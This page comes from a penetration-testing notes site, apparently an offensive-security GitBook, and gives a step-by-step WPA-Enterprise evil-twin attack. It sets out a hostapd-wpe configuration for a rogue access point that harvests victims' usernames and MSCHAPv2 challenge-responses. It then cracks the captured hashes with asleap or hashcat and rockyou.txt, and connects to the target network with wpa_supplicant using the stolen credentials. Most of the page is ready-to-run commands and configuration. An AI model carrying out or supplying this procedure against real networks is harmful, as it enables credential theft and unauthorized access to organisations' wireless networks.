🤯
Hacker Mind
  • Penetration Testing Notes
    • 00 - Kali Linux Preparation
    • Page 1
    • Web Application (80/443)
      • XSS
      • LFI / Path Traversal
      • Wordpress
    • SMB (445)
    • LDAP
    • MSRPC (135)
    • MSSQL
    • Kerberos (88/tcp)
    • DNS (53)
    • IPv6
    • Import Nessus to Metasploit
  • STUCK? Look at this :D
  • Buffer Overflow
    • BoF Script Python
  • Active Directory Recon
    • Username Generation
    • PowerView
    • BloodHound
    • Flooding Attack
  • Payload
    • Sendemail
    • Phishing Payload
    • Bypass All The Things
      • AppLocker
      • MSBuild Shell
      • C# Runner
      • Payload Mod
      • Powershell
      • Bypass AV Linux
        • C Runner
  • Exploit
    • Brute Force
    • File Upload
    • Cracking
    • Shell & Stabilization
    • Database
    • MSSQL Injection
  • Tradecraft
    • Invoke-ReflectivePEInjection
  • Metasploit
    • Meterpreter Tricks
  • Privilege Escalation
    • Lateral Movement
    • Linux
    • Windows
  • Post Exploit
    • Active Directory
      • Kerberos
      • ACLs/ACEs
      • DCSync
      • Golden Ticket with krbtgt
      • LAPS
      • Page
      • Impersonate Token
    • Pivoting
      • Pivot in a Case
    • Transfer File
    • Exfiltration
    • Persistence
  • WiFi Pentesting
    • WPA-PSK
    • WPA-E (hostapd)
    • Attack WEP
    • Evil Twin - Wi-Fi
    • WPA3 Downgrade
  • Hardware Hacking
    • Information Gathering
  • Practice & Lab
Powered by GitBook
On this page
  1. WiFi Pentesting

WPA-E (hostapd)

Make sure know the target SSID, this technique seems to be an Evil-Twin attack of the wifi access point.

change file in /etc/hostapd-wpe/hostapd-wpe.conf

# Configuration file for hostapd-wpe

# Interface - Probably wlan0 for 802.11, eth0 for wired
interface=wlan1

# May have to change these depending on build location
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ca_cert=/etc/hostapd-wpe/ca.pem
server_cert=/etc/hostapd-wpe/server.pem
private_key=/etc/hostapd-wpe/server.key
private_key_passwd=whatever
dh_file=/etc/hostapd-wpe/dh

# 802.11 Options
ssid=hostapd-wpe
channel=1
[snip]

Run Evil Twin:

sudo ./hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

After victim input username and password:

or check the log:

cat /var/log/hostapd-wpe.log

Then crack the password with rockyou.txt:

asleap -C <Challenge> -R <Response> -W /usr/share/wordlist/rockyou.txt

alternatively using hashcat:

hashcat -m 5500 ./hash_wifi.txt /usr/share/wordlist/rockyou.txt

ref:

https://wirelessdefence.co.uk/hostapd-wpe/

After got the password and the username connect with terminal:

create config file connect_wpa-e.conf

    network={
            scan_ssid=1
            eap=PEAP
            ssid="<TARGET-NAME>"
            key_mgmt=WPA-EAP
            identity="<DOMAIN\USERNAME>"
            password="<PASSWORD>"
            phase1="peaplabel=0"
            phase2="auth=MSCHAPV2"
    }

Then connect with wpa-supplicant:

sudo wpa_supplicant -B -i wlan0 -c ./connect_wpa-e.conf

Obtain an IP Address:

sudo dhclient wlan0

PreviousWPA-PSKNextAttack WEP

Last updated 6 days ago

image from https://wirelessdefence.co.uk/hostapd-wpe/
LogoWar RoomWar Room